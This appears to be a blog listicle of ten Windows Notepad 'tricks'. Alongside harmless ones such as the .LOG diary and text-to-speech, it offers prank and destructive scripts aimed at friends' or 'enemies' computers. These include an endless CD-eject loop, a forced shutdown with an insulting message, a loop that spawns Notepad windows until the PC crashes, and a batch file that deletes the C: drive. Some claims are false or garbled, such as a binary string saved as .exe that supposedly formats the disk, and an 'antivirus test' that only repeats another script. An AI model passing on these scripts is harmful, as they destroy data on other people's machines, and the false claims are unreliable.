Today, I am going to share 10 amazing Notepad Tricks & Hacks that you can use to get most out of Notepad and amaze your friends!
1. Create CD Virus from Notepad (continuously pop out CD Drive)
Open Notepad and Write down below codes:
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
2. Create Notepad Virus that Shutdown your Friend Computer with Message
@echo off
Shutdown.exe -s -t 10
cls
msg * I Don’t Like You SHIT head!
Shutdown.exe -s -t 10
cls
msg * I Don’t Like You SHIT head!
3. Open 100s of Notepad Tabs And Crash Your Friends PC/Laptop
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
4. Create Your Own Personal Diary With Time & Date With Notepad
This Notepad trick will allow you to create Notepad note in such a format that whenever you edit your note, it will get saved with date and timestamp automatically. To do this, follow these steps:
- Open Notepad
- Type .LOG in the first line.
- Save the file as Log.txt
- Now, write something to the file and it will automatically get saved with edited date and time
5. Test Your Anti-Virus Software’s Effectiveness
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
6. Create Matrix Movie Computer Screen Effects in Your Computer
Open Notepad and copy the below-mentioned text in your notepad file:
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
Now save the note as”matrix .bat ” in your PC/laptop. Reopen it and enjoy the Matrix-like effects that appear on your screen.
7. Convert Text Into Audio With This Notepad Trick
Open Notepad and type
Dim message, sapi message=InputBox(“Enter your text for conversion–Hacking-Techworm”,”Hover pc Hacks Text-To-Audio Converter”) Set sapi=CreateObject(“sapi.spvoice”) sapi.Speak message
Now save this note as “textaudio.vbs” on your computer. Open textaudio.vbs and hear your PC/laptop speak.
8. Disco Dancing Keyboard Light Trick
Open Notepad and copy the following text as it is.
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop
Now save the note as “disco.vbs” on your PC/laptop. Now reopen disco.vbs and watch your keyboard turn into disco lights.
9. Format Your Whole Hard Disk With This Notepad Trick
This is really interesting things for you guys, you can format any PC by executing below file. Open notepad and type the below code in it.
01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000
Now save it as “Format.exe” or give any name you desire but keep the extension as .exe. That’s It ! Now just double click on the file (to open it) and your C: drive will be formatted !
10. Write A Simple Undetectable Virus
Like the above trick, this will also delete the contents of your C: Drive. Open Notepad and copy paste the below text.
@Echo off
Del C:\ *.* |y
And save that as bomb.bat or any other name that you with .bat extension. When you double-click and open this file, it will start deleting the contents of your C:
The above two tricks are best to be tried on your enemies.